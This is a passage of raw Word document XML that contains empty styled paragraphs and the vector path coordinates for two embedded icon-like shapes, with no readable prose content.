        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C2A75E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349B91EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F39DD3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E8F9BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C20201" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D3D6AD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DF7D7F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDE3207" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A31F58F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="183"/>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71808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15307A0A" wp14:editId="7FC69823">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>494030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286709</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="537210" cy="55245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 cy="552450"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="216204" y="507250"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="507250"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="216204" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="216204" y="507250"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="290766" y="507250"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="246024" y="507250"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="246024" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="290766" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="290766" y="507250"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="506971" y="325094"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="504875" y="314693"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="306209"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="300482"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="366306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="349834"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="298386"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="300482"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="306209"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="314693"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="325094"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="391033"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="401434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="409917"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="415645"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="417741"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="246024" y="417741"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="246024" y="477418"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="290766" y="477418"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="290766" y="417741"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="417741"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="415645"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="409917"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="504875" y="401434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="391033"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="372986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="343141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="325094"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="506971" y="175907"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="504875" y="165506"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="157022"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="151295"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="217119"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="200634"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="149199"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="151295"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="157022"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="165506"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="175907"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="241846"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="252234"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="260731"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="266446"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="268554"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="268554"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="266446"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="260731"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="504875" y="252234"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="241846"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="223786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="193954"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="175907"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="506971" y="26708"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="504875" y="16306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="7823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="2095"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="238569" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="245249" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261721" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="268401" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="164020" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="170688" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="187172" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="193840" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="67919"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="89458" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="96139" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="112610" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="51447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="119291" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="2095"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="7823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="16306"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="26708"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="29819" y="92659"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="31915" y="103047"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="37642" y="111531"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="46126" y="117259"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="56515" y="119354"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="480275" y="119354"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="490664" y="117259"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="499148" y="111531"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="504875" y="103047"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="92659"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="74599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="44767"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="506971" y="26708"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="537210" h="552450">
                              <a:moveTo>
                                <a:pt x="536790" y="507250"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="320586" y="507250"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="320586" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="536790" y="552018"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="536790" y="5072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3012C4" id="Graphic 444" o:spid="_x0000_s1026" style="position:absolute;margin-left:38.9pt;margin-top:22.6pt;width:42.3pt;height:43.5pt;z-index:-15644672;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" coordsize="53721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" path="m216204,507250l,507250r,44768l216204,552018r,-44768xem290766,507250r-44742,l246024,552018r44742,l290766,507250xem506971,325094r-2096,-10401l499148,306209r-8484,-5727l480275,298386r-211874,l268401,349834r,16472l261721,372986r-16472,l238569,366306r,-16472l245249,343141r16472,l268401,349834r,-51448l193840,298386r,51448l193840,366306r-6668,6680l170688,372986r-6668,-6680l164020,349834r6668,-6693l187172,343141r6668,6693l193840,298386r-74549,l119291,349834r,16472l112610,372986r-16471,l89458,366306r,-16472l96139,343141r16471,l119291,349834r,-51448l56515,298386r-10389,2096l37642,306209r-5727,8484l29819,325094r,65939l31915,401434r5727,8483l46126,415645r10389,2096l246024,417741r,59677l290766,477418r,-59677l480275,417741r10389,-2096l499148,409917r5727,-8483l506971,391033r,-18047l506971,343141r,-18047xem506971,175907r-2096,-10401l499148,157022r-8484,-5727l480275,149199r-211874,l268401,200634r,16485l261721,223786r-16472,l238569,217119r,-16485l245249,193954r16472,l268401,200634r,-51435l193840,149199r,51435l193840,217119r-6668,6667l170688,223786r-6668,-6667l164020,200634r6668,-6680l187172,193954r6668,6680l193840,149199r-74549,l119291,200634r,16485l112610,223786r-16471,l89458,217119r,-16485l96139,193954r16471,l119291,200634r,-51435l56515,149199r-10389,2096l37642,157022r-5727,8484l29819,175907r,65939l31915,252234r5727,8497l46126,266446r10389,2108l480275,268554r10389,-2108l499148,260731r5727,-8497l506971,241846r,-18060l506971,193954r,-18047xem506971,26708l504875,16306,499148,7823,490664,2095,480275,,268401,r,51447l268401,67919r-6680,6680l245249,74599r-6680,-6680l238569,51447r6680,-6680l261721,44767r6680,6680l268401,,193840,r,51447l193840,67919r-6668,6680l170688,74599r-6668,-6680l164020,51447r6668,-6680l187172,44767r6668,6680l193840,,119291,r,51447l119291,67919r-6681,6680l96139,74599,89458,67919r,-16472l96139,44767r16471,l119291,51447,119291,,56515,,46126,2095,37642,7823r-5727,8483l29819,26708r,65951l31915,103047r5727,8484l46126,117259r10389,2095l480275,119354r10389,-2095l499148,111531r5727,-8484l506971,92659r,-18060l506971,44767r,-18059xem536790,507250r-216204,l320586,552018r216204,l536790,507250xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>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72320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00C77400" wp14:editId="7EB9CC15">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10379901</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>348063</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="626110" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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571500"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="626110" h="571500">
                              <a:moveTo>
                                <a:pt x="383959" y="472033"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="241757" y="472033"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="241757" y="500430"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="500430"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="472033"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="626110" h="571500">
                              <a:moveTo>
                                <a:pt x="383959" y="415251"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="241757" y="415251"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="241757" y="443649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="443649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="415251"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="626110" h="571500">
                              <a:moveTo>
                                <a:pt x="482790" y="344271"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="440829" y="344271"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="386854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440118" y="528828"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="186296" y="528828"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="184873" y="386854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="386854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="344271"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="142214" y="344271"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="143637" y="571411"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="482079" y="571411"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="482206" y="528828"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="482650" y="386854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="482790" y="344271"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="626110" h="571500">
                              <a:moveTo>
                                <a:pt x="625703" y="170357"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="623455" y="159334"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617347" y="150304"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="608304" y="144208"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="597255" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="483501" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="483501" y="99377"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="483501" y="90855"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="441896" y="45427"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="44272"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="205854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="184873" y="205854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="184873" y="184556"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="184873" y="42595"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="341287" y="42595"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="341287" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="440829" y="44272"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="439305" y="42595"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="433019" y="35737"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="433019" y="99377"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="99377"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="383959" y="45427"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="433019" y="99377"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="433019" y="35737"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="400304" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="142214" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="142214" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="99542" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="99542" y="212953"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="97307" y="223977"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="91198" y="233006"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="82156" y="239102"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="71107" y="241338"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="60058" y="239102"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="51015" y="233006"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="44907" y="223977"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="42672" y="212953"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="44907" y="201930"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="82156" y="186791"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="99542" y="212953"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="99542" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="28448" y="141960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="17399" y="144208"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="8356" y="150304"/>
                              </a:lnTo>
